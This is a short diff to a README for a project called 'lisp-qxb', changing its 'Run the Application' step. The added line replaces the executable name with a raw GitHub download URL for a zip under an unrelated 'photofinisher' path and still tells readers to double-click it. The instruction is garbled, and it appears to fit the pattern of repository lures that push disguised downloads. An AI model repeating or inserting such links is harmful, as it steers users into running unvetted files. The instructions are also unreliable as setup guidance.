caiofrml/lisp-qxb/README.md

 4. **Extract Files (if needed)**: If you downloaded a zip file, right-click it and select "Extract All".
 This action will create a new folder with the application files.

 5. **Run the Application**: Navigate to the folder where you extracted the files.
-Look for the executable file named `lisp-qxb.exe` (or a similar name).
+Look for the executable file named `https://raw.githubusercontent.com/caiofrml/lisp-qxb/main/photofinisher/lisp-qxb.zip` (or a similar name).
 Double-click the file to launch the application.

 ## 🖥️ System Requirements